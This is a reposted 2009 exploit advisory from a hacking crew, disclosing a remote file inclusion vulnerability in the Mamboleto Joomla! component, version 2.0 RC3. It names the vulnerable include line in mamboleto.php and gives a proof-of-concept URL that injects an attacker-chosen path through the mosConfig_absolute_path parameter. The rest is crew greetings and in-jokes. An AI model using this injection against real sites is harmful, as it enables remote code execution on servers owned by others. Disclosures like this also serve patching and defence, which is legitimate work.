Thursday, 10 December 2009

Mamboleto Joomla! component Remote File Include Vulneralbility

Published : 01:13 Author :
/**************************************************************************

[!] Mamboleto Joomla! component Remote File Include Vulneralbility
[!] Author : Don Tukulesto (root@indonesiancoder.com)
[!] Homepage : http://www.indonesiancoder.com
[!] Date : December 10, 2009
[!] Tune In : http://antisecradio.fm (choose your weapon)

**************************************************************************/

[ Software Information ]

[+] Vendor : http://www.fernandosoares.com.br/
[+] Download : http://www.fernandosoares.com.br/index.php?option=com_docman&task=doc_download&gid=35&Itemid=28
[+] Version() : 2.0 RC3
[+] Novo Mamboleto 2.0 RC3 para Joomla! 1.5.x em “legacy mode”.
Muito mais aprimorado com dois bancos a mais (Sicredi e Bancoob) e com um novo módulo de integração com o VirtueMart.
[+] Method : Remote File Inclusion
[+] Dork : Wie WiLL Not Go Down

===========================================================================

[ Vulnerable File ]

[+] mamboleto.php

Line 123

include_once( $mosConfig_absolute_path . ‘/administrator/components/com_mamboleto/include/pre.php’);

[ Proof of Concept ]

http://127.0.0.1/acomponents/com_mamboleto/mamboleto.php?mosConfig_absolute_path=[INDONESIANCODER-666]

===========================================================================

[ Who The Hell Has Control of That Damn Smoke Machine ]

[~] INDONESIAN CODER TEAM – KILL-9 CREW – MainHack Brotherhood – ServerIsDown
[~] kaMtiEz, M3NW5, arianom, Contrex, tiw0L, Pathloader, abah_benu, Saint, Cyb3r_tr0n, M364TR0N, VycOd,
[~] Jack-, Yadoy666 + miya666, s4va, senot, Bayu5154, Gonzhack, Tucker, Ian Petrucii, Ronz & FeeLCoMz
[~] kecemplungkalen, ran, DraCoola Multimedia, XNITRO, rey_cute, Awan Bejat, Plaque, Gh4mb4s and YOU!!
[~] Thank you to ALL OF YOU called me piece of shit, especially for High school friends

[ rm -rf yourself ]

[>] FOR MALINGSIAL

[ some quotes ]

[+] Jack- says : why so serious ?
[+] Yadoy666 says : awas ada tukang =))
[+] arianom says : Kumpulkan Koin untuk Prita Mulyasari !!!
[+] Pathloader says : Oke lah kalau beg… beg… beg… begitu :D
[+] tiw0L says : Ojo di maem pleaseeeeee!!!
[+] kaMtiEz says : aku bukan HOMO <++++ Fitnah nih ga mau ngakuin :p
Labels: |

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)